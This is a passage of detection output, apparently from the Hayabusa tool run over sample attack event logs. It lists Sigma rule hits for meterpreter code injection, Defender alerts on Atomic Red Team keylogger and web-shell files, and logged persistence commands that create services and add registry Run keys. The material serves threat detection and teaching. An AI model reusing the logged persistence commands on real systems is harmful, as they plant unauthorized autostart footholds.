Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start 
AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 
+09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN 
Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 